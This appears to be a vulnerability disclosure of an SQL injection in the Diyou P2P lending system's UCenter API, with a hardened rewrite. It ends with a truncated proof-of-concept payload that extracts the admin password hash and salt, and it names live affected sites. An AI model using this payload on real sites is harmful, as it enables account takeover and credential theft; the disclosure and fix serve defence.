Diyou P2P lending system: a file design defect allows SQL injection (arbitrary login / password change)
Description:
The UC interface file modules\ucenter\api\uc.php contains:

```php
error_reporting(7);
define('UC_CLIENT_ROOT', DISCUZ_ROOT.'./client/');
chdir('../');
require_once './config.inc.php';
$code = $_GET['code'];
parse_str(authcode($code, 'DECODE', UC_KEY), $get);
if(MAGIC_QUOTES_GPC) {
    $get = dstripslashes($get);
}
```

It does not check whether the UCenter integration is switched on, and

```php
if(MAGIC_QUOTES_GPC) {$get = dstripslashes($get);}
```

strips the GPC escaping from the decoded parameters.

```php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($strin
```

(The listing breaks off here in the original.) This is the system's built-in encryption function; its key is empty by default, which is what makes the injection possible.

```php
elseif($action == 'renameuser') {
    !API_RENAMEUSER && exit(API_RETURN_FORBIDDEN);
    // API interface for renaming a user
    $uid = $get['uid'];
    $usernamenew = $get['newusername'];
    $db->query("UPDATE {$tablepre}members SET username = '$usernamenew' WHERE uid = '$uid'");
    exit(API_RETURN_SUCCEED);
}
```

Both `$uid` and `$newusername` come straight from the decoded request and are concatenated into the UPDATE statement without escaping or type checks.
Anywhere
Yes
Case:
www.jinmaoweidai.com www.herunwang.com syziben.com www.lcbang.cn www.cheyidai88.com
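As an added example (not Diyou's or UCenter's own code), this is a hardened form of the renameuser handler: it refuses to serve the API when UC_KEY is empty or the integration is switched off, validates uid and newusername before they reach SQL, and runs the UPDATE as a parameterised statement. The PDO connection, the `pre_members` table, the `UC_KEY_EXAMPLE` constant, the switch flag and the sample rows are all constructed stand-ins for the real configuration; the self-check at the bottom only runs against an in-memory SQLite database.

```php
<?php
declare(strict_types=1);

// Stand-ins for values that would normally come from config.inc.php (hypothetical).
const UC_KEY_EXAMPLE = 'example-shared-secret';   // must never be left empty
const API_RETURN_FORBIDDEN = -1;
const API_RETURN_SUCCEED  = 1;

// With an empty UC_KEY, authcode() derives its key from a public value, so
// anyone can mint a valid token. Refuse to serve the API at all in that case,
// and also when the UCenter integration is switched off.
function uc_api_enabled(string $ucKey, bool $ucSwitch): bool
{
    return $ucSwitch && $ucKey !== '';
}

// Validate the decoded parameters before they get near SQL:
// uid must be a positive integer, username a short alphanumeric token.
function validate_rename_params(array $get): ?array
{
    if (!isset($get['uid'], $get['newusername'])) {
        return null;
    }
    if (!ctype_digit((string)$get['uid'])) {
        return null;
    }
    $name = (string)$get['newusername'];
    if (!preg_match('/^[A-Za-z0-9_]{3,15}$/', $name)) {
        return null;
    }
    return ['uid' => (int)$get['uid'], 'username' => $name];
}

// Hardened renameuser: a bound parameter can never change the statement shape,
// so a quote inside the value is stored as data, not executed as SQL.
function renameuser(PDO $db, string $tablepre, array $get): int
{
    $p = validate_rename_params($get);
    if ($p === null) {
        return API_RETURN_FORBIDDEN;
    }
    $stmt = $db->prepare("UPDATE {$tablepre}members SET username = :u WHERE uid = :id");
    $stmt->execute([':u' => $p['username'], ':id' => $p['uid']]);
    return API_RETURN_SUCCEED;
}

// Self-check against an in-memory table with two constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pre_members (uid INTEGER PRIMARY KEY, username TEXT, email TEXT)");
$db->exec("INSERT INTO pre_members VALUES (1, 'admin', 'admin@example.invalid'), (2, 'bob', 'bob@example.invalid')");

// A value shaped like the write-up's payload (quote followed by SQL) is rejected
// by the whitelist before any query is issued.
$payload = ['uid' => '2', 'newusername' => "xser', email = (select 1) where username = 'xser' #"];
assert(renameuser($db, 'pre_', $payload) === API_RETURN_FORBIDDEN);

// A legitimate rename touches only the addressed row.
assert(renameuser($db, 'pre_', ['uid' => '2', 'newusername' => 'bobby']) === API_RETURN_SUCCEED);
$rows = $db->query("SELECT uid, username, email FROM pre_members ORDER BY uid")->fetchAll(PDO::FETCH_ASSOC);
assert($rows[0]['email'] === 'admin@example.invalid');
assert($rows[1]['username'] === 'bobby');

// Empty shared secret => the API must stay closed regardless of the switch.
assert(!uc_api_enabled('', true));
assert(uc_api_enabled(UC_KEY_EXAMPLE, true));
echo "ok\n";
```

The two checks that matter most are the ones the original file lacks: the API is gated on a non-empty shared secret, and the UPDATE no longer interpolates request data into the SQL string.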
Proof of concept:
```php
$_G['time'] = time() + 10*36000;
$_G['action'] = 'renameuser';
$_G['newusername'] = "xser', email = (select row from (select concat(userid, 0x7c, username, 0x7c, PASSWORD, 0x7c, salt) row from #table_member WHERE userid = 1 limit 0,1) X1) where username = 'xser' #"; // writes the data into your own account
$code = urlencode(_authcode(http_build_query($_G), 'encoding'));
echo $code;

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
?>
```

(The listing ends here in the original, before the function's return and closing brace.)